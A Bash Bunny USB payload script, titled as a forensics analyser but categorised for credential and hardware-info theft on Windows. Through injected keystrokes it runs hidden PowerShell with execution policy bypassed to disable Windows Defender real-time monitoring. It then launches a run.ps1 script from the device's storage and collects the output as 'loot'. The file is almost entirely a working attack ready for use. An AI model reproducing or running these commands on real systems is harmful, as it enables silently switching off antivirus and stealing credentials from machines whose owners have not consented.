#!/bin/bash
#
# Title:         2202 Digital Forensics Bash Bunny Analyser
# Category:      Credentials and Computer Hardware Info
# Target:        Windows

# Options

######## INITIALIZATION ########
LED SETUP
GET SWITCH_POSITION

######## HID STAGE ########
ATTACKMODE HID STORAGE

######## MAKE LOOT AND FOLDERS DIRECTORY ########
# Setup named logs in loot directory

######## ATTACK ########
LED ATTACK

LED B
##disable windows defender###
RUN WIN "powerShell -windowstyle hidden -ExecutionPolicy Bypass .((Set-MpPreference -DisableRealtimeMonitoring $true))"
sleep 2

LED C
###Laptop Info###
RUN WIN Powershell -nop -ex Bypass -w Hidden ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\$SWITCH_POSITION\run.ps1')"
sleep 20

# Sync File System
LED B 100
sync; sleep 1; sync

######## FINISH ########
LED FINISH